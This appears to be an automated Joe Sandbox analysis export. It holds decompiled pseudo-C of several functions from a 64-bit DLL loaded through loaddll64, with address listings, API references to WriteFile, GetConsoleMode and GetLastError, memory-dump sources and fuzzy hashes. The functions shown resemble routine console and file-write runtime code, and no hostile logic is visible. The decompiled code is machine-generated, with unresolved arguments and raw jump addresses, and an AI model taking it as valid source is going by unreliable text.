                                                                                                      				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                      				if (_t212 - _t343 > 0) goto 0x7c110d55;
                                                                                                      				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                      				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                      				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                      				r14d = _t193;
                                                                                                      				r8d = _t193;
                                                                                                      				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                      				E00007FF87FF87C111744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                      				if (_t278 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t332 = _t331 + _t368;
                                                                                                      				r12d = r14d;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t359 =  *(_t336 - 0x59);
                                                                                                      				_t351 =  *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t359 * 8));
                                                                                                      				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                      				if ((_t213 & 0x00000004) == 0) goto 0x7c110bf7;
                                                                                                      				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                      				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                      				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                      				r8d = 2;
                                                                                                      				goto 0x7c110c40;
                                                                                                      				r8d =  *_t332 & 0x000000ff;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x7c110c3a;
                                                                                                      				_t373 =  &(_t332[1]);
                                                                                                      				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x7c110d93;
                                                                                                      				r8d = 2;
                                                                                                      				if (E00007FF87FF87C10E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t333 = _t373;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t198 = E00007FF87FF87C10E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                      				if (_t198 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t334 =  &(_t333[1]);
                                                                                                      				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                      				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                      				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                      				_t280 = _t336 + 0xf;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                      				r9d = r12d;
                                                                                                      				_t345 = _t336 - 0x7d;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				r14d = _t198;
                                                                                                      				if (_t198 == 0) goto 0x7c110db8;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                      				r8d = _t198;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c110db0;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x7c110db8;
                                                                                                      				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x7c110d10;
                                                                                                      				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                      				_t128 = _t280 - 0xc; // 0x1
                                                                                                      				r8d = _t128;
                                                                                                      				_t326 = _t338 + 0x40;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c110db0;
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x7c110db8;
                                                                                                      				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                      				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x7c110db8;
                                                                                                      				r8d =  *(_t336 - 0x5d);
                                                                                                      				goto 0x7c110a23;
                                                                                                      				if (_t326 <= 0) goto 0x7c110d50;
                                                                                                      				_t335 = _t334 - _t373;
                                                                                                      				 *((char*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                      				if (1 - _t326 < 0) goto 0x7c110d2f;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                      				goto 0x7c110db8;
                                                                                                      				if (_t345 <= 0) goto 0x7c110d8d;
                                                                                                      				_t327 = _t329;
                                                                                                      				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                      				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                      				 *((char*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                      				_t328 = _t327 + 1;
                                                                                                      				if (2 - _t345 < 0) goto 0x7c110d6d;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                      				goto 0x7c110db8;
                                                                                                      				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                      				 *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                      				_t174 = _t328 + 1; // 0x1
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                      				goto 0x7c110db8;
                                                                                                      				 *_t289 = GetLastError();
                                                                                                      				return E00007FF87FF87C103A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                      			}



















































                                                                                                      0x7ff87c110958
                                                                                                      0x7ff87c110966
                                                                                                      0x7ff87c11096a
                                                                                                      0x7ff87c110971
                                                                                                      0x7ff87c110979
                                                                                                      0x7ff87c11097d
                                                                                                      0x7ff87c110987
                                                                                                      0x7ff87c11098e
                                                                                                      0x7ff87c110995
                                                                                                      0x7ff87c110998
                                                                                                      0x7ff87c11099c
                                                                                                      0x7ff87c1109a3
                                                                                                      0x7ff87c1109aa
                                                                                                      0x7ff87c1109ae
                                                                                                      0x7ff87c1109bc
                                                                                                      0x7ff87c1109c0
                                                                                                      0x7ff87c1109cc
                                                                                                      0x7ff87c1109d1
                                                                                                      0x7ff87c1109d5
                                                                                                      0x7ff87c1109d8
                                                                                                      0x7ff87c1109db
                                                                                                      0x7ff87c1109e5
                                                                                                      0x7ff87c1109ee
                                                                                                      0x7ff87c1109f3
                                                                                                      0x7ff87c1109f8
                                                                                                      0x7ff87c1109fc
                                                                                                      0x7ff87c110a00
                                                                                                      0x7ff87c110a06
                                                                                                      0x7ff87c110a09
                                                                                                      0x7ff87c110a10
                                                                                                      0x7ff87c110a19
                                                                                                      0x7ff87c110a1d
                                                                                                      0x7ff87c110a25
                                                                                                      0x7ff87c110a29
                                                                                                      0x7ff87c110a2c
                                                                                                      0x7ff87c110a40
                                                                                                      0x7ff87c110a5b
                                                                                                      0x7ff87c110a64
                                                                                                      0x7ff87c110a68
                                                                                                      0x7ff87c110a72
                                                                                                      0x7ff87c110a77
                                                                                                      0x7ff87c110a8f
                                                                                                      0x7ff87c110a98
                                                                                                      0x7ff87c110a9e
                                                                                                      0x7ff87c110aa0
                                                                                                      0x7ff87c110aaa
                                                                                                      0x7ff87c110ab0
                                                                                                      0x7ff87c110ab6
                                                                                                      0x7ff87c110abc
                                                                                                      0x7ff87c110ac9
                                                                                                      0x7ff87c110ace
                                                                                                      0x7ff87c110ada
                                                                                                      0x7ff87c110aea
                                                                                                      0x7ff87c110af8
                                                                                                      0x7ff87c110b03
                                                                                                      0x7ff87c110b05
                                                                                                      0x7ff87c110b09
                                                                                                      0x7ff87c110b0d
                                                                                                      0x7ff87c110b1a
                                                                                                      0x7ff87c110b1c
                                                                                                      0x7ff87c110b1f
                                                                                                      0x7ff87c110b22
                                                                                                      0x7ff87c110b33
                                                                                                      0x7ff87c110b3c
                                                                                                      0x7ff87c110b4a
                                                                                                      0x7ff87c110b4d
                                                                                                      0x7ff87c110b55
                                                                                                      0x7ff87c110b5e
                                                                                                      0x7ff87c110b66
                                                                                                      0x7ff87c110b6f
                                                                                                      0x7ff87c110b75
                                                                                                      0x7ff87c110b79
                                                                                                      0x7ff87c110b85
                                                                                                      0x7ff87c110b87
                                                                                                      0x7ff87c110b8a
                                                                                                      0x7ff87c110b8d
                                                                                                      0x7ff87c110b91
                                                                                                      0x7ff87c110ba2
                                                                                                      0x7ff87c110bab
                                                                                                      0x7ff87c110bb1
                                                                                                      0x7ff87c110bb4
                                                                                                      0x7ff87c110bbb
                                                                                                      0x7ff87c110bc0
                                                                                                      0x7ff87c110bc4
                                                                                                      0x7ff87c110bcc
                                                                                                      0x7ff87c110bd4
                                                                                                      0x7ff87c110bdb
                                                                                                      0x7ff87c110be0
                                                                                                      0x7ff87c110be6
                                                                                                      0x7ff87c110beb
                                                                                                      0x7ff87c110bf5
                                                                                                      0x7ff87c110bf7
                                                                                                      0x7ff87c110c07
                                                                                                      0x7ff87c110c09
                                                                                                      0x7ff87c110c11
                                                                                                      0x7ff87c110c1a
                                                                                                      0x7ff87c110c2f
                                                                                                      0x7ff87c110c35
                                                                                                      0x7ff87c110c38
                                                                                                      0x7ff87c110c47
                                                                                                      0x7ff87c110c4f
                                                                                                      0x7ff87c110c55
                                                                                                      0x7ff87c110c58
                                                                                                      0x7ff87c110c5d
                                                                                                      0x7ff87c110c62
                                                                                                      0x7ff87c110c6a
                                                                                                      0x7ff87c110c6e
                                                                                                      0x7ff87c110c73
                                                                                                      0x7ff87c110c76
                                                                                                      0x7ff87c110c7f
                                                                                                      0x7ff87c110c84
                                                                                                      0x7ff87c110c89
                                                                                                      0x7ff87c110c8f
                                                                                                      0x7ff87c110c98
                                                                                                      0x7ff87c110cae
                                                                                                      0x7ff87c110cbc
                                                                                                      0x7ff87c110cc3
                                                                                                      0x7ff87c110cce
                                                                                                      0x7ff87c110cd5
                                                                                                      0x7ff87c110cda
                                                                                                      0x7ff87c110ce3
                                                                                                      0x7ff87c110ce3
                                                                                                      0x7ff87c110ce7
                                                                                                      0x7ff87c110cf7
                                                                                                      0x7ff87c110d01
                                                                                                      0x7ff87c110d07
                                                                                                      0x7ff87c110d0a
                                                                                                      0x7ff87c110d14
                                                                                                      0x7ff87c110d1e
                                                                                                      0x7ff87c110d22
                                                                                                      0x7ff87c110d2a
                                                                                                      0x7ff87c110d2c
                                                                                                      0x7ff87c110d3e
                                                                                                      0x7ff87c110d4e
                                                                                                      0x7ff87c110d50
                                                                                                      0x7ff87c110d53
                                                                                                      0x7ff87c110d58
                                                                                                      0x7ff87c110d5a
                                                                                                      0x7ff87c110d61
                                                                                                      0x7ff87c110d69
                                                                                                      0x7ff87c110d7c
                                                                                                      0x7ff87c110d82
                                                                                                      0x7ff87c110d8b
                                                                                                      0x7ff87c110d8d
                                                                                                      0x7ff87c110d91
                                                                                                      0x7ff87c110d95
                                                                                                      0x7ff87c110da2
                                                                                                      0x7ff87c110da8
                                                                                                      0x7ff87c110dab
                                                                                                      0x7ff87c110dae
                                                                                                      0x7ff87c110db6
                                                                                                      0x7ff87c110de1

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                      • Instruction ID: c20ee252d58c71e015aaea9534b493050686d9877b88ff522ce30f36c42c62c4
                                                                                                      • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                      • Instruction Fuzzy Hash: EED1C123F28A818AEB51CF69D4402AC37B1FB567D8B244236DE5D97B99CE3CD486C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 29%
                                                                                                      			E00007FF87FF87C11129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                      				signed short _v80;
                                                                                                      				void* _v92;
                                                                                                      				signed int _v96;
                                                                                                      				intOrPtr _v104;
                                                                                                      				intOrPtr _v108;
                                                                                                      				long _v112;
                                                                                                      				signed int _v120;
                                                                                                      				long long _v128;
                                                                                                      				signed int _v136;
                                                                                                      				void* __rbx;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				void* _t107;
                                                                                                      				long _t116;
                                                                                                      				signed int _t117;
                                                                                                      				void* _t122;
                                                                                                      				signed int _t128;
                                                                                                      				intOrPtr _t146;
                                                                                                      				intOrPtr _t147;
                                                                                                      				void* _t169;
                                                                                                      				signed long long _t182;
                                                                                                      				signed long long _t186;
                                                                                                      				signed long long _t189;
                                                                                                      				signed long long _t208;
                                                                                                      				signed int _t209;
                                                                                                      				void* _t210;
                                                                                                      				void* _t212;
                                                                                                      				void* _t228;
                                                                                                      				signed long long _t229;
                                                                                                      				signed short* _t230;
                                                                                                      				void* _t231;
                                                                                                      				signed short* _t232;
                                                                                                      
                                                                                                      				_t122 = __ebx;
                                                                                                      				r15d = r8d;
                                                                                                      				_t186 = __r9;
                                                                                                      				_t230 = __rdx;
                                                                                                      				if (r8d == 0) goto 0x7c111599;
                                                                                                      				if (__rdx != 0) goto 0x7c111303;
                                                                                                      				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                      				r8d = 0;
                                                                                                      				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                      				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                      				r9d = 0;
                                                                                                      				_v128 = __r9;
                                                                                                      				_v136 = _t209;
                                                                                                      				E00007FF87FF87C109674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                      				goto 0x7c11159b;
                                                                                                      				_t189 = __ecx >> 6;
                                                                                                      				_v120 = _t189;
                                                                                                      				_t229 = __ecx + __ecx * 8;
                                                                                                      				if (_t210 - 1 - 1 > 0) goto 0x7c111339;
                                                                                                      				if (( !r15d & 0x00000001) == 0) goto 0x7c1112cc;
                                                                                                      				if (( *( *((intOrPtr*)(0x7c17f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x7c11134f;
                                                                                                      				r8d = 0x7ff87c17f942;
                                                                                                      				E00007FF87FF87C111E38(r12d);
                                                                                                      				_v96 = _t209;
                                                                                                      				if (E00007FF87FF87C1116A0(r12d, __ecx) == 0) goto 0x7c111485;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x7c17f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x7c111485;
                                                                                                      				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x7c111396;
                                                                                                      				0x7c109140();
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x7c1113b2;
                                                                                                      				_t182 =  *((intOrPtr*)(0x7c17f940 + _v120 * 8));
                                                                                                      				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x7c111485;
                                                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x7c11147a;
                                                                                                      				if (sil == 0) goto 0x7c111457;
                                                                                                      				sil = sil - 1;
                                                                                                      				if (sil - 1 > 0) goto 0x7c11151e;
                                                                                                      				_t228 = _t230 + _t231;
                                                                                                      				_v112 = _t209;
                                                                                                      				_t232 = _t230;
                                                                                                      				if (_t230 - _t228 >= 0) goto 0x7c111514;
                                                                                                      				_v80 =  *_t232 & 0x0000ffff;
                                                                                                      				_t107 = E00007FF87FF87C111E40( *_t232 & 0xffff);
                                                                                                      				_t128 = _v80 & 0x0000ffff;
                                                                                                      				if (_t107 != _t128) goto 0x7c111449;
                                                                                                      				_t146 = _v108 + 2;
                                                                                                      				_v108 = _t146;
                                                                                                      				if (_t128 != 0xa) goto 0x7c11143a;
                                                                                                      				if (E00007FF87FF87C111E40(0xd) != 0xd) goto 0x7c111449;
                                                                                                      				_t147 = _t146 + 1;
                                                                                                      				_v108 = _t147;
                                                                                                      				if ( &(_t232[1]) - _t228 >= 0) goto 0x7c111514;
                                                                                                      				goto 0x7c1113fa;
                                                                                                      				_v112 = GetLastError();
                                                                                                      				goto 0x7c111514;
                                                                                                      				r9d = r15d;
                                                                                                      				_v136 = __r9;
                                                                                                      				E00007FF87FF87C110958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                      				asm("movsd xmm0, [eax]");
                                                                                                      				goto 0x7c111519;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x7c17f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x7c1114e1;
                                                                                                      				_t169 = sil;
                                                                                                      				if (_t169 == 0) goto 0x7c1114cd;
                                                                                                      				if (_t169 == 0) goto 0x7c1114b9;
                                                                                                      				if (_t147 - 1 != 1) goto 0x7c111529;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C110EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C111004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C110DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r8d = r15d;
                                                                                                      				_v136 = _v136 & _t182;
                                                                                                      				_v112 = _t182;
                                                                                                      				_v104 = 0;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x7c111511;
                                                                                                      				_t116 = GetLastError();
                                                                                                      				_v112 = _t116;
                                                                                                      				asm("movsd xmm0, [ebp-0x30]");
                                                                                                      				asm("movsd [ebp-0x20], xmm0");
                                                                                                      				if (_t116 != 0) goto 0x7c111592;
                                                                                                      				_t117 = _v96;
                                                                                                      				if (_t117 == 0) goto 0x7c111568;
                                                                                                      				if (_t117 != 5) goto 0x7c111558;
                                                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                      				 *(_t186 + 0x34) = _t117;
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				_t208 = _t186;
                                                                                                      				E00007FF87FF87C10B3DC(_v96, _t208);
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				if (( *( *((intOrPtr*)(0x7c17f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x7c11157a;
                                                                                                      				if ( *_t230 == 0x1a) goto 0x7c111599;
                                                                                                      				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				goto 0x7c11159b;
                                                                                                      				return 0;
                                                                                                      			}



































                                                                                                      0x7ff87c11129c
                                                                                                      0x7ff87c1112b2
                                                                                                      0x7ff87c1112b8
                                                                                                      0x7ff87c1112bb
                                                                                                      0x7ff87c1112c1
                                                                                                      0x7ff87c1112ca
                                                                                                      0x7ff87c1112cc
                                                                                                      0x7ff87c1112d1
                                                                                                      0x7ff87c1112d4
                                                                                                      0x7ff87c1112da
                                                                                                      0x7ff87c1112e1
                                                                                                      0x7ff87c1112e9
                                                                                                      0x7ff87c1112ec
                                                                                                      0x7ff87c1112f1
                                                                                                      0x7ff87c1112f6
                                                                                                      0x7ff87c1112fe
                                                                                                      0x7ff87c111313
                                                                                                      0x7ff87c111317
                                                                                                      0x7ff87c11131b
                                                                                                      0x7ff87c11132e
                                                                                                      0x7ff87c111337
                                                                                                      0x7ff87c11133f
                                                                                                      0x7ff87c111346
                                                                                                      0x7ff87c11134a
                                                                                                      0x7ff87c111352
                                                                                                      0x7ff87c111368
                                                                                                      0x7ff87c111377
                                                                                                      0x7ff87c111381
                                                                                                      0x7ff87c111386
                                                                                                      0x7ff87c1113a1
                                                                                                      0x7ff87c1113a3
                                                                                                      0x7ff87c1113ac
                                                                                                      0x7ff87c1113c7
                                                                                                      0x7ff87c1113d0
                                                                                                      0x7ff87c1113d6
                                                                                                      0x7ff87c1113dd
                                                                                                      0x7ff87c1113e3
                                                                                                      0x7ff87c1113e7
                                                                                                      0x7ff87c1113eb
                                                                                                      0x7ff87c1113f1
                                                                                                      0x7ff87c111401
                                                                                                      0x7ff87c111405
                                                                                                      0x7ff87c11140a
                                                                                                      0x7ff87c111411
                                                                                                      0x7ff87c111413
                                                                                                      0x7ff87c111416
                                                                                                      0x7ff87c11141d
                                                                                                      0x7ff87c111431
                                                                                                      0x7ff87c111433
                                                                                                      0x7ff87c111435
                                                                                                      0x7ff87c111441
                                                                                                      0x7ff87c111447
                                                                                                      0x7ff87c11144f
                                                                                                      0x7ff87c111452
                                                                                                      0x7ff87c111457
                                                                                                      0x7ff87c11145a
                                                                                                      0x7ff87c111469
                                                                                                      0x7ff87c11146e
                                                                                                      0x7ff87c111475
                                                                                                      0x7ff87c11148e
                                                                                                      0x7ff87c111492
                                                                                                      0x7ff87c111495
                                                                                                      0x7ff87c11149a
                                                                                                      0x7ff87c11149f
                                                                                                      0x7ff87c1114a5
                                                                                                      0x7ff87c1114b2
                                                                                                      0x7ff87c1114b7
                                                                                                      0x7ff87c1114b9
                                                                                                      0x7ff87c1114c6
                                                                                                      0x7ff87c1114cb
                                                                                                      0x7ff87c1114cd
                                                                                                      0x7ff87c1114da
                                                                                                      0x7ff87c1114df
                                                                                                      0x7ff87c1114ec
                                                                                                      0x7ff87c1114ef
                                                                                                      0x7ff87c1114f7
                                                                                                      0x7ff87c1114fb
                                                                                                      0x7ff87c111506
                                                                                                      0x7ff87c111508
                                                                                                      0x7ff87c11150e
                                                                                                      0x7ff87c111514
                                                                                                      0x7ff87c111519
                                                                                                      0x7ff87c111533
                                                                                                      0x7ff87c111535
                                                                                                      0x7ff87c11153a
                                                                                                      0x7ff87c11153f
                                                                                                      0x7ff87c111541
                                                                                                      0x7ff87c111545
                                                                                                      0x7ff87c11154c
                                                                                                      0x7ff87c111550
                                                                                                      0x7ff87c111553
                                                                                                      0x7ff87c11155b
                                                                                                      0x7ff87c11155e
                                                                                                      0x7ff87c111563
                                                                                                      0x7ff87c111572
                                                                                                      0x7ff87c111578
                                                                                                      0x7ff87c11157a
                                                                                                      0x7ff87c11157e
                                                                                                      0x7ff87c111582
                                                                                                      0x7ff87c111589
                                                                                                      0x7ff87c11158d
                                                                                                      0x7ff87c111597
                                                                                                      0x7ff87c1115ab

                                                                                                      APIs
                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF87C11123C), ref: 00007FF87C1113BF
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF87C11123C), ref: 00007FF87C111449
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                      • Instruction ID: 9af842bd599ce4bd0035824cc4db8f3a59a34d568db860ec03bd81a6391ee791
                                                                                                      • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                      • Instruction Fuzzy Hash: 1991BE63A3865286FB908F65D4803BDA7A0BB06BD8F655136DE0E57A94DF3CD4C1C320
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 47%
                                                                                                      			E00007FF87FF87C101CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				intOrPtr* _t48;
                                                                                                      				intOrPtr* _t50;
                                                                                                      				intOrPtr* _t52;
                                                                                                      				intOrPtr _t62;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x7c101d3a;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				_t48 = _a16 - __rax;
                                                                                                      				E00007FF87FF87C101DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                      				goto 0x7c101de7;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				_t62 =  *0x7c17a228; // 0xffffffffffffffff
                                                                                                      				_t50 = _t62 -  *_t48;
                                                                                                      				if (_t50 - _a24 > 0) goto 0x7c101d65;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t50, _a8);
                                                                                                      				_t52 =  *_t50 + _a24;
                                                                                                      				_v24 = _t52;
                                                                                                      				if (_a24 <= 0) goto 0x7c101de2;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x7c101de2;
                                                                                                      				E00007FF87FF87C1018F0(_t52, _a8);
                                                                                                      				_v16 = _t52;
                                                                                                      				E00007FF87FF87C102170(_t52, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_v16 +  *_t52, _a16, _a24);
                                                                                                      				return E00007FF87FF87C1023A0(_v16 +  *_t52, _a8, _v24);
                                                                                                      			}









                                                                                                      0x7ff87c101ce0
                                                                                                      0x7ff87c101ce5
                                                                                                      0x7ff87c101cea
                                                                                                      0x7ff87c101d07
                                                                                                      0x7ff87c101d0e
                                                                                                      0x7ff87c101d1b
                                                                                                      0x7ff87c101d30
                                                                                                      0x7ff87c101d35
                                                                                                      0x7ff87c101d3f
                                                                                                      0x7ff87c101d47
                                                                                                      0x7ff87c101d51
                                                                                                      0x7ff87c101d59
                                                                                                      0x7ff87c101d60
                                                                                                      0x7ff87c101d6a
                                                                                                      0x7ff87c101d72
                                                                                                      0x7ff87c101d77
                                                                                                      0x7ff87c101d82
                                                                                                      0x7ff87c101d84
                                                                                                      0x7ff87c101d9b
